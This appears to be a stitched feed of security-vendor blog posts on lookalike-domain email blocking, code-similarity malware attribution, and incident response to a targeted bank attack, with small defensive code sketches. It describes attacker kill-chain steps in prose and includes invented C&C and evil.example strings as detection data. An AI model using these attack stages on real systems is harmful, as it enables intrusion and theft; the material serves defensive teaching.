When simple solutions no longer suited our clients, they came to us for something more complex. The result was a method that requires no user interaction. In a nutshell, it automatically compiles a global list of legitimate domains that could potentially be faked, on which basis it analyzes and blocks messages from lookalike domains. In essence, it is proactive.

How it works

Protection against lookalike-domain attacks is three-pronged: client-side processing; domain reputation check in Kaspersky Security Network; infrastructure-side processing. The general principle is shown schematically below:

In practice, it goes as follows. On receiving an email, the technology forwards the sender domain to Kaspersky Security Network (KSN), which matches it against the list of lookalike domains already known to us. If the sender domain is found, the message is instantly blocked (steps 1 to 3). If there is no information about it, the email is quarantined for a short fixed period (step 4). This gives time for the technology to check the domain according to the set algorithm, and, if it recognizes it as fake, to add it to the list of lookalike domains in KSN. After the email leaves quarantine, it is rescanned (step 9) and blocked, since by then the list of lookalike domains has been updated.

Let's take a look at how sender verification works and how the list of lookalike domains gets updated. Information about quarantined messages is sent to the KSN database together with additional metadata, including the sender domain (step 5). At the first stage of analysis, the domain undergoes a "suspiciousness" check based on a wide range of criteria, such as Whois data, DNS records, certificates, and so on; the purpose of this stage is to quickly sift out domains that are clearly legitimate but not yet known to our system. From then on, emails from these domains are no longer quarantined, because KSN has information about them.

At the second stage, the system compares suspicious domains against the addresses in our global list of legitimate domains (step 7), which includes the domains of our clients and their counterparties. This list is generated automatically based on an assessment of the frequency with which legitimate messages are sent from a domain and the uniformity of the mail flow over time. The extent to which the overall picture matches the behavior of employees in terms of business correspondence determines the reputation of the domain (step 6). If the resemblance of the scammer's domain to a legitimate address is high, the sender domain too is added to the list of lookalike domains and all messages sent from it are blocked.
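
Condensed into code, the client-side part of this flow might look like the self-contained sketch below; the in-memory verdict sets and function name are purely illustrative stand-ins for the KSN interface.

KNOWN_LOOKALIKES = {"kapersky.com"}      # already confirmed fakes
KNOWN_LEGITIMATE = {"kaspersky.com"}     # already confirmed clean
quarantine = []

def handle_message(sender_domain):
    if sender_domain in KNOWN_LOOKALIKES:    # steps 1-3: verdict already known
        return "blocked"
    if sender_domain in KNOWN_LEGITIMATE:
        return "delivered"
    quarantine.append(sender_domain)         # step 4: hold the unknown domain
    # steps 5-8 happen on the infrastructure side: suspiciousness check,
    # similarity comparison, reputation update; the lists above get refreshed
    return "quarantined, rescanned on release (step 9)"

print(handle_message("netffix.com"))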

Our approach is more complex than simply registering lookalike domains to the company and enables real-time blocking of attacks that use such domains as soon as they appear. In addition, the human factor is eliminated, and the global list of legitimate domains stays current thanks to automatic updates.

Looking at Big Threats Using Code Similarity. Part 1 https://securelist.com/big-threats-using-code-similarity-part-1/97239/ https://securelist.com/big-threats-using-code-similarity-part-1/97239/#respond Tue, 09 Jun 2020 10:00:37 +0000 https://kasperskycontenthub.com/securelist/?p=97239

Today, we are announcing the release of KTAE, the Kaspersky Threat Attribution Engine. This code attribution technology, developed initially for internal use by the Kaspersky Global Research and Analysis Team, is now being made available to a wider audience. You can read more about KTAE in our official press release, or go directly to its info page on the Kaspersky Enterprise site. From internal tool to prototype to product, the road took about three years. We tell the story of that trip below, throwing in a few code examples as well. However, before diving into KTAE, it's important to talk about how it all started, on a sunny day approximately three years ago.

May 12, 2017, a Friday, started in a very similar fashion to many other Fridays: I woke up, made coffee, showered and drove to work. As I was reading e-mails, one message from a colleague in Spain caught my attention. Its subject said “Crisis … (and more)”. Now, crisis (and more!) is not something that people appreciate on a Friday, and it wasn’t April 1st either. Going through the e-mail from my colleague, it became obvious something was going on in several companies around the world. The e-mail even had an attachment with a photo, which is now world famous:

Soon after that, Spain's Computer Emergency Response Team, CCN-CERT, posted an alert on its site about a massive ransomware attack affecting several Spanish organizations. The alert recommended the installation of updates from the Microsoft March 2017 Security Bulletin as a means of stopping the spread of the attack. Meanwhile, the National Health Service (NHS) in the U.K. also issued an alert and confirmed infections at 16 medical institutions.

As we dug into the attack, we confirmed infections in several other countries, including Russia, Ukraine and India.

Quite essential in stopping these attacks was the Kaspersky System Watcher component, which can roll back the changes made by ransomware in the event that a malicious sample manages to bypass other defenses. This is extremely useful when a ransomware sample slips past them and attempts to encrypt the data on the disk.

As we kept analysing the attack, we started learning more; for instance, the infection relied on a famous exploit (codenamed "EternalBlue") that had been made available on the internet through the Shadowbrokers dump on April 14, 2017, and patched by Microsoft on March 14. Despite the patch having been available for two months, it appeared that many companies hadn't applied it. We put together a couple of blogs, updated our technical support pages and made sure all samples were detected and blocked, even on systems that were vulnerable to the EternalBlue exploit.

Meanwhile, as everyone was trying to research the samples, we were scouting for any possible links to known criminal or APT groups, trying to determine how newcomer malware was able to cause such a pandemic in just a few days. The explanation here is simple: for ransomware, it is not very often that we get to see completely new, built-from-scratch, pandemic-level samples. In most cases, ransomware attacks make use of some popular malware that is sold by criminals on underground forums or "as a service".

And yet, we couldn’t spot any links with known ransomware variants. Things became a bit clearer on Monday evening, when Neel Mehta, a researcher at Google, posted a mysterious message on Twitter with the #WannaCryptAttribution hashtag:

The cryptic message in fact referred to a similarity between two samples that share code. The two samples Neel referred to in the post were:

  • A WannaCry sample from February 2017 which looks like a very early variant
  • A Lazarus APT group sample from February 2015

The similarity can be observed in the screenshot below, taken between the two samples, with the shared code highlighted:

Although some people doubted the link, we immediately realized that Neel Mehta was right. We put together a blog diving into this similarity, "WannaCry and Lazarus Group – the missing link?". The discovery of this code overlap was obviously not a random hit. For years, Google integrated the technology they acquired from Zynamics into their analysis tools, making it possible to cluster together malware samples based on shared code. Obviously, the technology seemed to work rather nicely. Interestingly, one month later, an article was published suggesting the NSA also reportedly believed in this link.

Thinking about the story and the overlap between WannaCry and Lazarus, we put a plan together: what if we built a technology that could quickly identify code reuse between malware attacks and pinpoint the likely culprits in future cases? The goal would be to make this technology widely available to help threat hunters, SOCs and CERTs speed up incident response and malware triage. The first prototype for this new technology was available internally in June 2017, and we continued to work on it, fine-tuning it, over the following months.

In principle, the problem of code similarity is relatively easy. Several approaches have been tested and discussed in the past, including:

  • Calculating checksums for subs and comparing them against a database
  • Reconstructing the code flow and creating a graph from it; comparing graphs for similar structures
  • Extracting n-grams and comparing them against a database
  • Using fuzzy hashes on the whole file or parts of it
  • Using metadata, such as the rich header, exports or other parts of the file; although this isn’t code similarity, it can still yield some very good results

To find the common code between two malware samples, one can, for instance, extract all 8-16 byte strings, then check for overlaps. There are two main problems with that, though:

  • Our malware collection is too big; if we want to do this for all the files we have, we’d need a large computing cluster (read: thousands of machines) and lots of storage (read: Petabytes)
  • Capex too small

Additionally, doing this massive code extraction, profiling and storage, not to mention searching, in an efficient way that we can provide as a stand-alone box, VM or appliance is another level of complexity.
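
To see the scale problem in practice, consider a naive Python sketch of that approach (the file names are hypothetical): even this toy version keeps every n-gram of every file in memory, which is exactly what doesn't scale to a collection of petabytes. Real systems also work on disassembled code rather than raw bytes.

def ngrams(path, n=12):
    # extract all fixed-length byte n-grams from a file
    data = open(path, "rb").read()
    return {data[i:i + n] for i in range(len(data) - n + 1)}

def shared_code_ratio(path_a, path_b):
    a, b = ngrams(path_a), ngrams(path_b)
    return len(a & b) / max(1, min(len(a), len(b)))

# e.g. shared_code_ratio("wannacry_feb2017.bin", "lazarus_2015.bin")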

To refine it, we started experimenting with code-based Yara rules. The idea was also simple and beautiful: create a Yara rule from the unique code found in a sample, then use our existing systems to scan the malware collection with that Yara rule.

Here’s one such example, inspired by WannaCry:

The innocent-looking Yara rule above catches BlueNoroff (malware used in the Bangladesh Bank Heist), ManusCrypt (a more complex malware used by the Lazarus APT, also known as FALLCHILL) and Decafett, a keylogger that we previously couldn't associate with any known APT.

A breakthrough in terms of identifying shared code came in Sep 2017, when for the first time we were able to associate a new, “unknown” malware with a known entity or set of tools. This happened during the #CCleaner incident, which was initially spotted by Morphisec and Cisco Talos.

In particular, our technology spotted a fragment of code, part of a custom base64 encoding subroutine, in the Cbkrdr shellcode loader that was identical to one seen in a previous malware sample named Missl, allegedly used by APT17:

Digging deeper, we identified at least three malware families that shared this code: Missl, Zoxpng/Gresim and Hikit, as shown below in the Yara hits:

In particular, the hits above are the results of running a custom Yara rule, based on what we call “genotypes” – unique fragments of code, extracted from a malware sample, that do not appear in any clean sample and are specific to that malware family (as opposed to being a known piece of library code, such as zlib for instance).
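
A toy version of genotype extraction might look like the following: keep only the n-grams of a sample that never occur in a corpus of clean files, then print the survivors as candidate strings for a Yara rule. The corpus path, n-gram length and output format are illustrative assumptions.

import glob

def ngrams(path, n=12):
    data = open(path, "rb").read()
    return {data[i:i + n] for i in range(len(data) - n + 1)}

def genotypes(sample_path, clean_corpus_glob, n=12):
    grams = ngrams(sample_path, n)
    for clean in glob.glob(clean_corpus_glob):
        grams -= ngrams(clean, n)     # drop anything seen in clean files
    return grams

for g in sorted(genotypes("sample.bin", "clean_corpus/*"))[:5]:
    print("$code_%s = { %s }" % (g.hex()[:8], g.hex()))  # candidate Yara strings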

As a side note, Kris McConkey from PwC delivered a wonderful dive into Axiom's tools during his talk "Following APT OpSec failures" at SAS 2015 – highly recommended if you're interested in learning more about this APT super-group.

Soon, the Kaspersky Threat Attribution Engine – “KTAE” – also nicknamed internally “Yana”, became one of the most important tools in our analysis cycle.

Digging deeper, or more case studies

The United States Cyber Command, or in short "USCYBERCOM", began posting samples to VirusTotal in November 2018, an excellent move in our opinion. The only drawback of these uploads was the lack of any context, such as the malware family, whether it is APT or criminal, which group uses the samples, and whether they were found in the wild or scooped from certain places. Although the first upload, a repurposed Absolute Computrace loader, wasn't much of an issue to recognize, an upload from May 2019 was a bit more tricky to identify. It was immediately flagged as Sofacy by our technology, in particular as similar to known XTunnel samples, a backdoor used by the group. Here is what the KTAE report looks like for the sample in question:

Analysis for d51d485f98810ab1278df4e41b692761

In February 2020, USCYBERCOM posted another batch of samples that we quickly checked with KTAE. The results indicated a pack of different malware families, used by several APT groups, including Lazarus, with their BlueNoroff subgroup, Andariel, HollyCheng, with shared code fragments stretching back to the DarkSeoul attack, Operation Blockbuster and the SPE Hack.

Going further, USCYBERCOM posted another batch of samples in May 2020, for which KTAE revealed a similar pattern.

Of course, one might wonder, what else can KTAE do except help with the identification of VT dumps from USCYBERCOM?

For a more practical check, we looked at the samples from the 2018 SingHealth data breach that, according to Wikipedia, was initiated by unidentified state actors. Although most samples used in the attack are rather custom and do not show any similarity with previous attacks, two of them have rather interesting links:

KTAE analysis for two samples used in the SingHealth data breach

Mofang, a suspected Chinese-speaking threat actor, was described in more detail in 2016 in this FOX-IT research paper, written by Yonathan Klijnsma and his colleagues. Interestingly, the paper also mentioned Singapore as a suspected country where this actor is active. Although the similarities are extremely weak, 4% and 1% respectively, they can easily point the investigator in the right direction for further research.

Another interesting case is the discovery and publication ("DEADLYKISS: HIT ONE TO RULE THEM ALL. TELSY DISCOVERED A PROBABLE STILL UNKNOWN AND UNTREATED APT MALWARE AIMED AT COMPROMISING INTERNET SERVICE PROVIDERS") from our colleagues at Telsy of a new, previously unknown malware dubbed "DeadlyKiss". A quick check with KTAE on the artifact with sha256 c0d70c678fcf073e6b5ad0bce14d8904b56d73595a6dde764f95d043607e639b (md5: 608f3f7f117daf1dc9378c4f56d5946f) reveals a couple of interesting similarities with other Platinum APT samples, both in terms of code and unique strings.

Analysis for 608f3f7f117daf1dc9378c4f56d5946f

Another interesting case presented itself when we were analysing a set of files included in one of the Shadowbrokers dumps.

Analysis for 07cc65907642abdc8972e62c1467e83b

In the case above, “cnli-1.dll” (md5: 07cc65907642abdc8972e62c1467e83b) is flagged as being up to 8% similar to Regin. Looking into the file, we spot this as a DLL, with a number of custom looking exports:

Looking into these exports, for instance, fileWriteEx, shows the library has actually been created to act as a wrapper for popular IO functions, most likely for portability purposes, enabling the code to be compiled for different platforms:

Speaking of multiplatform malware, recently our colleagues from Leonardo published their awesome analysis of a new set of Turla samples targeting Linux systems. We originally published about those in 2014, when we discovered Turla Penquin, one of this group's backdoors for Linux. One of these samples (sha256: 67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502) was uploaded to VirusTotal in April 2020. A quick check in KTAE for this sample reveals the following:

Analysis for b4587870ecf51e8ef67d98bb83bc4be7 – Turla 64 bit Penquin sample

We can see a very high degree of similarity with two other samples (99% in both cases), as well as lower-similarity hits on other known Turla Penquin samples. Looking at the strings they have in common, we immediately spot a few very good candidates for Yara rules; quite notably, some of them were already included in the Yara rules that Leonardo provided with their paper.

 

When code similarity fails

When looking at an exciting, brand new technology, sometimes it’s easy to overlook any drawbacks and limitations. However, it’s important to understand that code similarity technologies can only point in a certain direction, while it’s still the analyst’s duty to verify and confirm the leads. As one of my friends used to say, “the best malware similarity technology is still not a replacement for your brain” (apologies, dear friend, if the quote is not 100% exact, that was some time ago). This leads us to the case of OlympicDestroyer, a very interesting attack, originally described and named by Cisco Talos.

In their blog, the Cisco Talos researchers also pointed out that OlympicDestroyer used similar techniques to Badrabbit and NotPetya to reset the event log and delete backups. Although the intention and purpose of both implementations of the techniques are similar, there are many differences in the code semantics. It’s definitely not copy-pasted code, and because the command lines were publicly discussed on security blogs, these simple techniques became available to anyone who wants to use them.

In addition, Talos researchers noted that the evtchk.txt filename, which the malware used as a potential false-flag during its operation, was very similar to the filenames (evtdiag.exe, evtsys.exe and evtchk.bat) used by BlueNoroff/Lazarus in the Bangladesh SWIFT cyberheist in 2016.

Soon after the Talos publication, the Israeli company IntezerLabs tweeted that they had found links to Chinese APT groups. As a side note, IntezerLabs have an exceptional code similarity technology of their own, which you can check out by visiting analyze.intezer.com.

IntezerLabs further released a blogpost with an analysis of features found using their in-house malware similarity technology.

A few days later, media outlets started publishing articles suggesting potential motives and activities by Russian APT groups: “Crowdstrike Intelligence said that in November and December of 2017 it had observed a credential harvesting operation operating in the international sporting sector. At the time it attributed this operation to Russian hacking group Fancy Bear”…

On the other hand, Crowdstrike’s own VP of Intelligence, Adam Meyers, in an interview with the media, said: “There is no evidence connecting Fancy Bear to the Olympic attack”.

Another company, Recorded Future, decided to not attribute this attack to any actor; however, they claimed that they found similarities to BlueNoroff/Lazarus LimaCharlie malware loaders that are widely believed to be North Korean actors.

During this "attribution hell", we also used KTAE to check the samples for any possible links to previously known campaigns. Amazingly, KTAE discovered a unique pattern that also linked Olympic Destroyer to Lazarus. A combination of certain code development environment features stored in executable files, known as the Rich header, may in some cases be used as a fingerprint identifying the malware authors and their projects. In the case of the Olympic Destroyer wiper sample analyzed by Kaspersky, this "fingerprint" produced a match with a previously known Lazarus malware sample. Here's how today's KTAE reports it:

Analysis for 3c0d740347b0362331c882c2dee96dbf

The 4% similarity shown above comes from the matches in the sample's Rich header. Initially, we were surprised to find the link, even though it made sense; other companies also spotted the similarities, and Lazarus was already known for many destructive attacks. Something seemed odd, though. The possibility of North Korean involvement looked way off the mark, especially since Kim Jong-un's own sister attended the opening ceremony in Pyeongchang. According to our forensic findings, the attack was started immediately before the official opening ceremony on February 9, 2018. As we dug deeper into this case, we concluded it was an elaborate false flag; further research allowed us to associate the attack with the Hades APT group (make sure you also read our analysis: "Olympic destroyer is here to trick the industry").
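
For readers who want to experiment, below is a minimal sketch of deriving a Rich-header fingerprint from a PE file with nothing but the Python standard library. It illustrates the general idea only; it is not how KTAE computes its fingerprints.

import hashlib, struct

def rich_fingerprint(path):
    data = open(path, "rb").read()
    pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
    end = data.find(b"Rich", 0, pe_offset)   # the header ends with "Rich" + key
    if end == -1:
        raise ValueError("no Rich header found")
    key = data[end + 4:end + 8]              # 4-byte XOR key follows "Rich"
    decoded, pos = [], end - 4
    while pos >= 0:
        dword = bytes(b ^ k for b, k in zip(data[pos:pos + 4], key))
        if dword == b"DanS":                 # start marker reached
            break
        decoded.append(dword)                # (comp.id, count) pairs + padding
        pos -= 4
    decoded.reverse()
    return hashlib.md5(b"".join(decoded)).hexdigest()

# Matching fingerprints across samples hint at a shared build environment,
# but as this case shows, the header can also be deliberately forged.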

This proves that even the best attribution or code similarity technology can be manipulated by a sophisticated attacker, and such tools shouldn't be relied upon blindly. Of course, in nine out of ten cases the hints work very well, but as actors become more skilled and attribution becomes a sensitive geopolitical topic, we may see more false flags like the ones found in OlympicDestroyer.

If you liked this blog, then you can hear more about KTAE and using it to generate effective Yara rules during the upcoming “GReAT Ideas, powered by SAS” webinar, where, together with my colleague Kurt Baumgartner, we will be discussing practical threat hunting and how KTAE can boost your research. Make sure to register for GReAT Ideas, powered by SAS, by clicking here.

Register: https://www.brighttalk.com/webcast/15591/414427

Note: more information about the APTs discussed here, as well as KTAE, is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

 

Neutralization reaction https://securelist.com/neutralization-reaction/81620/ https://securelist.com/neutralization-reaction/81620/#respond Fri, 25 Aug 2017 09:45:18 +0000 https://kasperskycontenthub.com/securelist/?p=81620

 Incident Response Guide (PDF)

Despite there being no revolutionary changes to the cyberthreat landscape in the last few years, the growing informatization of business processes provides cybercriminals with numerous opportunities for attacks. They are focusing on targeted attacks and learning to use their victims’ vulnerabilities more effectively while remaining under the radar. As a result, businesses are feeling the effects of next-gen threats without the appearance of new malware types.

Unfortunately, corporate information security services often turn out to be unprepared: their employees underestimate the speed, stealth and efficiency of modern cyberattacks and do not recognize how ineffective the old approaches to security are. Even when traditional prevention tools such as anti-malware products, IDS/IPS and security scanners are combined with detection solutions like SIEM and anti-APT, this costly toolset may not be used to its full potential. And if there is no clear understanding of what sort of incident is unfolding, an attack cannot be repelled.

More detailed information on the stages involved in organizing a cyberattack and responding to incidents can be found in the full version of this guide or obtained within the framework of Kaspersky Lab’s educational program. Here we will only focus on the main points.

Planning an attack

First of all, it should be noted that by targeted attacks we are referring to serious operations prepared by qualified cybercriminals. Cyber hooliganism, such as defacing the homepage of a site to attract attention or demonstrate capabilities, is not considered here. As a rule, the success of activities of that kind means a company has no information security service to speak of, even if one exists on paper.

The basic principles of any targeted attack include thorough preparation and a stage-by-stage strategy. Here we will investigate the sequence of stages (known as the kill chain), using as an example an attack on a bank to steal money from ATMs.

1. Reconnaissance

At this stage, publicly available information about the bank and its data assets is collected. In particular, the attacker tries to determine the company's organizational structure and tech stack, the information security measures in place, and the options for carrying out social engineering on its employees. The last point may include collecting information on forums and social networking sites, especially those of a professional nature.

2. Weaponization

Once the data is collected, cybercriminals choose the method of attack and select appropriate tools. They may use new or already existing malware that allows them to exploit detected security vulnerabilities. The malware delivery method is also selected at this stage.

3. Delivery

To deliver the necessary malware, email attachments, malicious and phishing links, watering hole attacks (infection of sites visited by employees of the targeted organization) or infected USB devices are used. In our example, the cybercriminals resorted to spear phishing, sending emails to specific bank employees on behalf of a financial regulator – the Central Bank of the Russian Federation (Bank of Russia). The email contained a PDF document that exploited a vulnerability in Adobe Reader.

4. Exploitation

In the event of a successful delivery, for example, an employee opening the attachment, the exploit uses the vulnerability to download the payload. As a rule, it consists of the tools necessary to carry out the subsequent stages of the attack. In our example, it was a Trojan downloader that, once installed, downloaded a bot from the attacker’s server the next time the computer was switched on.

If delivery fails, cybercriminals usually do not just give up; they take a step (or several steps) back in order to change the attack vector or malware used.

5. Installation

Malicious software infects the computer so that it cannot be detected or removed after a reboot or the installation of an update. For example, the above Trojan downloader registers itself in Windows startup and adds a bot there. When the infected PC is started next time, the Trojan checks the system for the bot and, if necessary, reloads it.

The bot, in turn, is constantly present in the computer’s memory. In order to avoid user suspicion, it is masked under a familiar system application, for example, lsass.exe (Local Security Authentication Server).

6. Command and control

At this stage, the malware waits for commands from the attackers. The most common way to receive commands is to connect to a C&C server that belongs to the fraudsters. This is what the bot in our example did: when it first contacted the C&C server, it received a command to carry out further proliferation (lateral movement) and began to connect to other computers within the corporate network.

If infected computers do not have direct access to the Internet and cannot connect directly to the C&C server, the attacker can send other software to the infected machine, deploy a proxy server in the organization’s network, or infect physical media to overcome the ‘air gap’.

7. Actions on objective

Now, the cybercriminals can work with the data on a compromised computer: copying, modifying or deleting it. If the necessary information is not found, the attackers may try to infect other machines in order to increase the amount of available information or to obtain additional information that allows them to reach their primary goal.

The bot in our example infected other PCs in search of a machine from which it could log on as an administrator. Once such a machine was found, the bot turned to the C&C server to download the Mimikatz program and the Ammyy Admin remote administration tools.

Example of Mimikatz execution. All the logins and passwords are displayed in clear text, including the Active Directory user passwords.

If successful, the bot can connect to the ATM gateway and launch attacks on ATMs: for example, it can plant a program in an ATM that will dispense cash when a special plastic card is detected.

The final stage of the attack is removing and hiding any traces of the malware in the infected systems, though these activities are not usually included in the kill chain.

The effectiveness of incident investigation and the extent of material and reputational damage to the affected organization directly depend on the stage at which the attack is detected.

If the attack is detected at the ‘Actions on objective’ stage (late detection), it means the information security service was unable to withstand the attack. In this case, the affected company should reconsider its approach to information security.

My network is my castle

We have analyzed the stages of a targeted attack from the point of view of cybercriminals; now let’s look at it from the point of view of the affected company’s information security staff. The basic principles behind the work of both sides are essentially the same: careful preparation and a step-by-step strategy. But the actions and tools of the information security specialists are fundamentally different because they have very different objectives, namely:

  • Mitigate the damage caused by an attack;
  • Restore the initial state of the information system as quickly as possible;
  • Develop instructions to prevent similar incidents in future.

These objectives are achieved in two main stages – incident investigation and system restoration. Investigation must determine:

  • Initial attack vector;
  • Malware, exploits and other tools used by the attackers;
  • Target of the attack (affected networks, systems and data);
  • Extent of damage (including reputational damage) to the organization;
  • Stage of attack (whether it is completed and goals are achieved);
  • Time frames (time the attack started and ended, when it was detected in the system and response time of the information security service).

Once the investigation is completed, it is necessary to develop and implement a system recovery plan, using the information obtained during investigation.

Let’s return to the step-by-step strategy. Overall, the incident response protection strategy looks like this:

Incident response stages

As with the stages of the targeted attack, we will analyze in more detail each stage involved in combating an attack.

1. Preparation

Preparation includes developing processes and policies and selecting tools. First of all, it means the creation of a multi-level security system that can withstand intruders using several attack vectors. The levels of protection can be divided into two groups.

The first includes the installation of tools designed to prevent attacks (Prevention):

  • security solutions for workstations;
  • intrusion detection and intrusion prevention systems (IDS/IPS);
  • firewall to protect the Internet gateway;
  • proxy server to control Internet access.

The second group consists of solutions designed to detect threats (Detection):

  • SIEM system with integrated threat reporting component that monitors events occurring in the information system;
  • Anti-APT system that compares data on detected threats delivered by various security mechanisms;
  • Honeypot – a special fake object for cyberattacks that is isolated and closely monitored by the information security service;
  • EDR-systems (tools for detecting and responding to threats on endpoints) that raise awareness of events occurring on endpoints and enable automatic containment and elimination of threats.

The organization we chose as an example was ready for unexpected attacks. The ATMs were separated from the main network of the bank, with access to the subnet limited to authorized users.

Network of the attacked organization

The SIEM system was used to monitor and analyze events occurring on the network. It collected:

  • information about network connections to the proxy server that was used by all employees to access the Internet;
  • integrated threat data feeds provided by Kaspersky Lab specialists;
  • notifications of emails that passed through the Postfix mail server, including information about headers, DKIM signatures, etc.;

SIEM also received information about security solution activation on any workstation in the corporate IT infrastructure.

Another important preparation element is penetration testing to predict the possible vector of a cyberattack. Penetration of the corporate network can be simulated by both the company’s IT specialists and third-party organizations. The latter option is more expensive, though preferable: organizations that specialize in pen tests have extensive experience and are better informed about the current threat vectors.

The last – but by no means least – important element is educating the organization’s employees. This includes internal cybersecurity training for all employees: they should be aware of the corporate security policies and know what to do in the event of a cyberattack. It also includes targeted training for specialists responsible for the company’s information security, as well as the accumulation of information about security incidents inside and outside the company. This information may come from different sources such as internal company reports or third-party organizations that specialize in analyzing cyberthreats, for example, Kaspersky Threat Intelligence Portal.

2. Identification

At this stage, it is necessary to determine whether it is actually an incident or not. Only then can the alarm be raised and colleagues warned. In order to identify an incident, so-called triggers are used – events that indicate a cyberattack. These include attempts by a workstation to connect to a known malicious C&C server, errors or failures in security software performance, unexpected changes to user rights, unknown programs on the network, and much more.

Information about these events can come from a variety of sources. Here we will consider two key types of triggers:

  • Triggers generated by EPP management systems. When a security solution on one of the workstations detects a threat, it generates an event and sends it to the management system. However, not all events are triggers: for example, an event indicating the detection of a malicious program can be followed by an event about its neutralization. In this case, no investigation is necessary, unless the situation recurs on the same machine or with the same user (a minimal sketch of this filtering logic follows the list).
  • Incident triggers generated by SIEM systems. SIEM systems can accumulate data from a huge number of security controls, including proxy servers and firewalls. Only those events that result from correlating incoming data with threat intelligence are considered triggers.
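
Here is the promised sketch of the first trigger type: a detection followed by a neutralization is suppressed, unless it is left unresolved or keeps recurring on the same host. The event format is our assumption:

    from collections import Counter

    # Toy event stream from an EPP management system (format assumed).
    events = [
        {"host": "WS-01", "type": "malware_detected"},
        {"host": "WS-01", "type": "malware_neutralized"},
        {"host": "WS-07", "type": "malware_detected"},   # never neutralized
        {"host": "WS-01", "type": "malware_detected"},
        {"host": "WS-01", "type": "malware_neutralized"},
    ]

    detections = Counter()
    open_incidents = set()

    for e in events:
        if e["type"] == "malware_detected":
            detections[e["host"]] += 1
            open_incidents.add(e["host"])
        elif e["type"] == "malware_neutralized":
            open_incidents.discard(e["host"])

    # A trigger is raised for hosts with an unresolved detection,
    # or where the same situation keeps recurring.
    triggers = {h for h in detections if h in open_incidents or detections[h] >= 2}
    print(triggers)  # e.g. {'WS-01', 'WS-07'}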

To identify an incident, the information available to the information security service is compared with a list of known indicators of compromise (IOC). Public reports, threat data feeds, static and dynamic sample analysis tools, etc. can be used for this purpose.

Static analysis is performed without launching the test sample and includes collecting various indicators, such as strings containing a URL or an email address, etc. Dynamic analysis involves executing the program under investigation in a protected environment (sandbox) or on an isolated machine in order to identify the sample’s behavior and collect indicators of compromise.
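
As a toy example of the static indicator collection described above, the following Python sketch pulls URL and email strings out of a sample's bytes. The regular expressions are deliberately crude and the sample bytes are invented:

    import re

    # Crude static analysis: extract URL and email indicators from raw bytes.
    URL_RE = re.compile(rb"https?://[\w.\-/%?=&]+")
    EMAIL_RE = re.compile(rb"[\w.+\-]+@[\w\-]+\.[\w.\-]+")

    def extract_indicators(data: bytes):
        urls = {m.decode(errors="replace") for m in URL_RE.findall(data)}
        emails = {m.decode(errors="replace") for m in EMAIL_RE.findall(data)}
        return urls, emails

    # Invented sample bytes containing embedded configuration strings.
    sample = b"\x00\x01config=http://203.0.113.5/gate.php;mail=ops@evil.example\x00"
    print(extract_indicators(sample))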

Cycle of IOC detection

As seen from the picture above, collecting IOCs is a cyclic process. Based on the initial information from the SIEM system, identification scenarios are generated, which leads to the identification of new indicators of compromise.

Here is an example of how threat data feeds can be used to identify a spear-phishing attack – in our case, emails with an attached PDF document that exploits an Adobe Reader vulnerability.

  1. SIEM will detect the IP address of the server that sent the email using IP Reputation Data Feed.
  2. SIEM will detect the request to load the bot using Malicious URL Data Feed.
  3. SIEM will detect a request to the C&C server using Botnet C&C URL Data Feed.
  4. Mimikatz will be detected and removed by a security solution for workstations; information about the detection will go to SIEM.

Thus, at an early stage, an attack can be detected in four different ways. It also means the company will suffer minimal damage.

3. Containment

Suppose that, due to a heavy workload, the information security service couldn’t respond to the first alarms, and by the time there was a response, the attack had reached the sixth stage, i.e., malware had successfully penetrated a computer on the corporate network and tried to contact the C&C server, and the SIEM system had received notice of the event.

In this case, the information security specialists should identify all compromised computers and change the security rules to prevent the infection from spreading over the network. In addition, they should reconfigure the information system so that it can ensure the company’s continuous operation without the infected machines. Let’s consider each of these actions in more detail.

Isolation of compromised computers

All compromised computers should be identified, for example, by finding in SIEM all calls to the known C&C address – and then placed in an isolated network. In this case, the routing policy should be changed to prevent communication between compromised machines and other computers on the corporate network, as well as the connection of compromised computers to the Internet.

It is also recommended to check the C&C address using a special service, for example, Threat Lookup. Such a lookup returns not only the hashes of the bots that interacted with the C&C server but also the other addresses those bots contacted. After that, it is worth repeating the search in SIEM across the extended list of indicators, since the same bot on different computers may have interacted with several C&C servers. All infected workstations that are identified must be isolated and examined.
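
This cyclic expansion of the indicator list can be pictured as a breadth-first search over indicators. In the Python sketch below, threat_lookup and siem_search are stub functions standing in for a Threat Lookup query and a SIEM search; all data is invented:

    def threat_lookup(c2_address):
        """Stub for a threat intelligence query: returns bot hashes and
        other C&C addresses those bots contacted (data invented)."""
        fake_db = {"198.51.100.20": (["hash_of_bot_sample"], ["203.0.113.77"])}
        return fake_db.get(c2_address, ([], []))

    def siem_search(indicator):
        """Stub: return hosts whose events reference the indicator."""
        fake_events = {"198.51.100.20": ["WS-03"], "203.0.113.77": ["WS-11"]}
        return fake_events.get(indicator, [])

    # Breadth-first expansion of the indicator list, as in the IOC cycle above.
    seen, queue, compromised = set(), ["198.51.100.20"], set()
    while queue:
        ioc = queue.pop(0)
        if ioc in seen:
            continue
        seen.add(ioc)
        compromised.update(siem_search(ioc))
        _, more_c2s = threat_lookup(ioc)
        queue.extend(more_c2s)

    print(compromised)  # hosts to isolate and examine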

In this case, the compromised computers should not be turned off, as this can complicate the investigation. Specifically, some types of malware reside only in the computer's RAM and create no files on the hard disk, while others can remove IOCs once the system receives a shutdown signal.

It is also not recommended to disconnect the affected PC's local network connections (above all, physically). Some types of malware monitor the connection status, and if the connection is unavailable for a certain period of time, the malware may begin to remove traces of its presence on the computer, destroying any IOCs. At the same time, it makes sense to limit the access of infected machines to the internal and external networks, for example, by blocking the transfer of packets using iptables.
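
As one hedged illustration of limiting network access without dropping the link, the sketch below inserts DROP rules on a Linux gateway via iptables. The chain choice and the idea of driving this from Python are our assumptions; the rules must be adapted to the actual network and run with administrative privileges:

    import subprocess

    def restrict_host(ip):
        """Drop forwarded traffic to/from an infected host at the gateway,
        keeping its link state up so the malware sees no disconnection.
        Illustrative rules only; adapt chains/interfaces to your network."""
        rules = [
            ["iptables", "-I", "FORWARD", "-s", ip, "-j", "DROP"],
            ["iptables", "-I", "FORWARD", "-d", ip, "-j", "DROP"],
        ]
        for rule in rules:
            subprocess.run(rule, check=True)

    # restrict_host("10.0.0.15")  # uncomment on the gateway, as root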

For more information on what to do if the search by a C&C address does not provide the expected results, or on how to identify malware, read the full version of this guide.

Creation of memory dumps and hard disk dumps

